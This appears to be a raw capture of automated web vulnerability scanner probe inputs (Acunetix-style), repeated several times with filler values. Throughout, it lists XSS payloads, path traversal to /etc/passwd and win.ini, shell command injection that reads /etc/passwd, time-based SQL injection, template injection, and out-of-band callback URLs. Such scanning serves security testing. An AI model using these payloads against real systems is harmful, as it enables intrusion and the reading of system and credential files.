\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(945588)</ScRiPt>

1

1

1

................windowswin.ini

1<video><source onerror="javascript:prompt(944745)">

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933610)"></g></svg>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<div style=width:expression(prompt(902226))>

1

response.write(9138526*9744159)

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<iframe src='data:text/html

'+response.write(9138526*9744159)+'

&cat /etc/passwd&

1

1

'&cat /etc/passwd&'

1

"+response.write(9138526*9744159)+"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<body onload=prompt(919864)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(944821)>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=xyz OnErRor=prompt(930398)>

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

`cat /etc/passwd`

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<img/src=">" onerror=alert(979659)>

1

1

-1

../../../../../../../../../../etc/passwd.jpg

1

${99205+100106}

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt%20>prompt(995286)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

1

1&n901220=v927909

1

1

1&lt

1some_inexistent_file_with_long_name%00.jpg

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

1

1

)

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

tjlnZlkn'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

\xf6<img acu onmouseover=prompt(987766) //\xf6>

1

!(()&&!|*|*|

1

/etc/passwd

LDkL10Ga')

'

'"()

1<input autofocus onfocus=prompt(985323)>

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

jVuDn1zM'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

"

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

-1

1

||cat /etc/passwd

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

[url=http://www.acunetix.com]website security[/url]

1

1

&dir

http://hitT8owEjDZvo.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

-1))

'&dir&'

1

1

1_yKWk6 <ScRiPt >prompt(963635)</ScRiPt>

ANhnHsLK'

1

${@print(md5(acunetix_wvs_security_test))}\

comments

1

"&dir&"

1

file:///etc/passwd

1

1

r7TvNxzg')

1

/\../\../\../\../\../\../\../etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

|dir

comments

1

1

DJX1rOfS'))

http://www.acunetix.tst

1

1

WEB-INF/web.xml

1

1

comments/.

'|dir

'"

1

1

WEB-INF\web.xml

1

1'"()&%<ScRiPt >prompt(989532)</ScRiPt>

1

1

<!--

"|dir

1

1

1

'"()&%<ScRiPt >prompt(932482)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1

1

1_996067

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acu9705\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9705

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

acux7227\xc0\xbez1\xc0\xbcz2a\x90bcxuca7227

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(961570)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<script>prompt(900651)</script>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(906490)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954761></ScRiPt>

1

1

1

1<ScRiPt >prompt(976328)</ScRiPt>

WEB-INF/web.xml

1

WEB-INF\web.xml

response.write(9570251*9012971)

1<video><source onerror="javascript:prompt(962564)">

1

1

1

1

'+response.write(9570251*9012971)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922301)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9570251*9012971)+"

1

1

1<div style=width:expression(prompt(956932))>

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<iframe src='data:text/html

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

cat /etc/passwd

1<body onload=prompt(990617)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(913664)>

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(999912)>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

${100366+100097}

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1

'|'ld

1<img/src=">" onerror=alert(935922)>

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

yXO009q4'

"|"ld

1&n967531=v958859

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt%20>prompt(962739)</sCripT>

1

/etc/passwd

)

53M0E5B0')

'

1

testasp.vulnweb.com

1&lt

1

"

bR1SpApF'))

!(()&&!|*|*|

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'"()

1

'

1

\xf6<img acu onmouseover=prompt(979326) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

^(#$!@#$)(()))******

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1<input autofocus onfocus=prompt(920558)>

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

-1)

1

||cat /etc/passwd

http://hitSBdm4N7amT.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

1

1

1

-1))

1

&dir

file:///etc/passwd

acunetix_wvs_invalid_filename

1

[url=http://www.acunetix.com]website security[/url]

n3MdhYfu'

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

1

1

1

comments

1_OLZqF <ScRiPt >prompt(906745)</ScRiPt>

KEKA4ePD')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

WEB-INF/web.xml

1

1

comments

1

"&dir&"

1

WEB-INF\web.xml

idsLUmzg'))

'"

1

http://www.acunetix.tst

1

1

comments/.

1

1'"()&%<ScRiPt >prompt(900495)</ScRiPt>

|dir

../../../../../../../../../../windows/win.ini

1

1

<!--

1

1

1

../../../../../../../../../../boot.ini

'|dir

'"()&%<ScRiPt >prompt(973605)</ScRiPt>

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1_929664

"|dir

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu8815\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8815

1

1

1

acux6937\xc0\xbez1\xc0\xbcz2a\x90bcxuca6937

1

................windowswin.ini

1

1

1

1<ScRiPt >prompt(903783)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(978545)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(960255)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951865></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(958144)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(915402)">

1

1

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939248)"></g></svg>

response.write(9408144*9636156)

&cat /etc/passwd&

1

1

'+response.write(9408144*9636156)+'

1<div style=width:expression(prompt(939269))>

WEB-INF\web.xml

1

'&cat /etc/passwd&'

1

"+response.write(9408144*9636156)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

cat /etc/passwd

1<body onload=prompt(946039)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

${99204+99176}

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948279)>

`cat /etc/passwd`

1

1

-1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(964625)>

1

1&n915502=v927260

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

-1)

1

1

1

1<img/src=">" onerror=alert(962272)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

-1))

1some_inexistent_file_with_long_name%00.jpg

1

)

yfvu0LPp'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(945218)</sCripT>

1

"|"ld

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

xOyYiQDD')

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

"

iPVP8Roa'))

1

testasp.vulnweb.com

1

/etc/passwd

1

\xf6<img acu onmouseover=prompt(979630) //\xf6>

1

'

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1

1

1

"

${@print(md5(acunetix_wvs_security_test))}\

1

1<input autofocus onfocus=prompt(921736)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1)

1

http://hitnK9RBqL3Oe.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

<a href='http://www.acunetix.com'>website security</a>

acunetix_wvs_invalid_filename

1

1

||cat /etc/passwd

1

1

-1))

1

1

comments

[url=http://www.acunetix.com]website security[/url]

1

1

2qk3u9x5'

1

1

&dir

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1_s68at <ScRiPt >prompt(923818)</ScRiPt>

file:///etc/passwd

01xps6nh')

1

'&dir&'

1

comments/.

'"

1

1

1

/\../\../\../\../\../\../\../etc/passwd

QN5TBaA2'))

1

"&dir&"

1

<!--

1

1'"()&%<ScRiPt >prompt(925533)</ScRiPt>

1

1

|dir

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(927895)</ScRiPt>

1

1

1

WEB-INF\web.xml

'|dir

1_948055

1

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

../../../../../../../../../../boot.ini

acu2189\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2189

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux9437\xc0\xbez1\xc0\xbcz2a\x90bcxuca9437

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(999906)</ScRiPt>

1

1

................windowswin.ini

1<script>prompt(917458)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(991933)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?911814></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(939481)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

response.write(9600928*9175136)

1<video><source onerror="javascript:prompt(929908)">

1

1

1

'+response.write(9600928*9175136)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(931215)"></g></svg>

1

WEB-INF/web.xml

1

1

&cat /etc/passwd&

"+response.write(9600928*9175136)+"

1<div style=width:expression(prompt(957650))>

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

${99604+99699}

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

1

1<body onload=prompt(995909)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(933871)>

1

1

1&n990063=v975950

-1

`cat /etc/passwd`

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(968799)>

1

1

-1)

)

|cat /etc/passwd#

1<img/src=">" onerror=alert(992040)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

!(()&&!|*|*|

-1))

1

1<ScRiPt%20>prompt(999882)</sCripT>

1

testasp.vulnweb.com

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

rfDUiGZU'

1&lt

^(#$!@#$)(()))******

"|"ld

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

nagpUG8N')

1

1

1

\xf6<img acu onmouseover=prompt(991288) //\xf6>

6AwEDTRO'))

1

/etc/passwd

1

'

'

1<input autofocus onfocus=prompt(939347)>

1

1

1

-1

"

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

1

<a href='http://www.acunetix.com'>website security</a>

-1)

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitvpIhDwGv7Z.bxss.me/

-1))

[url=http://www.acunetix.com]website security[/url]

1

acunetix_wvs_invalid_filename

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

HIeM4Wrj'

'&dir&'

comments

1

1_j8o9Q <ScRiPt >prompt(974624)</ScRiPt>

1

1

jXsL6svv')

1

1

"&dir&"

comments

http://www.acunetix.tst

'"

1

Y4LJN9rL'))

1

file:///etc/passwd

1

|dir

comments/.

1

<!--

1

1

1

1'"()&%<ScRiPt >prompt(974795)</ScRiPt>

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

1

'"()&%<ScRiPt >prompt(901709)</ScRiPt>

1

1

WEB-INF/web.xml

1

1

1

1_920707

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

acu4041\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4041

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux4014\xc0\xbez1\xc0\xbcz2a\x90bcxuca4014

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<ScRiPt >prompt(960569)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(902827)</script>

1

1

1<ScRiPt >prompt(935002)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977955></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(947847)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(934293)">

1

1

1

response.write(9586683*9013586)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(954960)"></g></svg>

&cat /etc/passwd&

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<div style=width:expression(prompt(908780))>

1

'+response.write(9586683*9013586)+'

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

"&cat /etc/passwd&"

1

"+response.write(9586683*9013586)+"

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

cat /etc/passwd

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<body onload=prompt(958554)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(991206)>

1

-1

1

1

1

1

${99270+100482}

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(989352)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

1

1&n919527=v983261

1<img/src=">" onerror=alert(940291)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

1

1some_inexistent_file_with_long_name%00.jpg

-1))

)

1<ScRiPt%20>prompt(900896)</sCripT>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

DO2PU90u'

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

1&lt

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1

'"()

gNRWUrhr')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

'

1

\xf6<img acu onmouseover=prompt(910794) //\xf6>

1

/etc/passwd

7r3jOAO6'))

1

'

1

"

1<input autofocus onfocus=prompt(932651)>

1

1

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

"

1

1

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

acunetix_wvs_invalid_filename

1

http://hitySskHqp0WU.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

-1))

1

1

1_aZyDe <ScRiPt >prompt(944811)</ScRiPt>

1

&dir

1

comments

7ZUaFRoE'

1

1

'&dir&'

http://www.acunetix.tst

'"

1

file:///etc/passwd

2FtoljlB')

comments/.

1

1

/\../\../\../\../\../\../\../etc/passwd

<!--

"&dir&"

1'"()&%<ScRiPt >prompt(935769)</ScRiPt>

1

1

1

1

hMWGyANp'))

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(982805)</ScRiPt>

|dir

1

1

1

1

1_997237

WEB-INF\web.xml

1

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

"|dir

../../../../../../../../../../boot.ini

1

1

acu8390\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8390

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux8091\xc0\xbez1\xc0\xbcz2a\x90bcxuca8091

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(951532)</ScRiPt>

1

1

1<script>prompt(998238)</script>

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(980960)</ScRiPt>

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932620></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(903538)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(900581)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(997616)"></g></svg>

1

1

1<div style=width:expression(prompt(912092))>

1

response.write(9515847*9448306)

1

1

'+response.write(9515847*9448306)+'

1<iframe src='data:text/html

1

&cat /etc/passwd&

1

1

WEB-INF/web.xml

"+response.write(9515847*9448306)+"

1<body onload=prompt(994151)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

1

1

1

'&cat /etc/passwd&'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(955879)>

1

1

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(980655)>

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

${100473+100480}

1

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(910631)>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1&n974849=v990668

`cat /etc/passwd`

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(979200)</sCripT>

)

1

-1

|cat /etc/passwd#

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'|'ld

1

-1)

\xf6<img acu onmouseover=prompt(937206) //\xf6>

'"()

testasp.vulnweb.com

^(#$!@#$)(()))******

/etc/passwd

1

-1))

1

"|"ld

1<input autofocus onfocus=prompt(991455)>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

BjfMHAK1'

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

4O7hwtbH')

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

'

1

1

${@print(md5(acunetix_wvs_security_test))}

1

ceIrAYah'))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1_yk5r5 <ScRiPt >prompt(938839)</ScRiPt>

1

1

"

-1

${@print(md5(acunetix_wvs_security_test))}\

http://hitA6WrH3BZkh.bxss.me/

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

-1)

1

1

file:///etc/passwd

1

1

1

-1))

comments

&dir

1

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(924300)</ScRiPt>

1

'"

x59JilCB'

1

'&dir&'

1

comments

WEB-INF/web.xml

MjxsAAGr')

<!--

1

'"()&%<ScRiPt >prompt(987011)</ScRiPt>

1

1

comments/.

"&dir&"

lbt4IW7F'))

WEB-INF\web.xml

1

1

1

1

1_959168

1

|dir

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1

../../../../../../../../../../boot.ini

'|dir

acu2220\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2220

1

1

1

../../../../../../../../../../windows/win.ini.jpg

"|dir

1

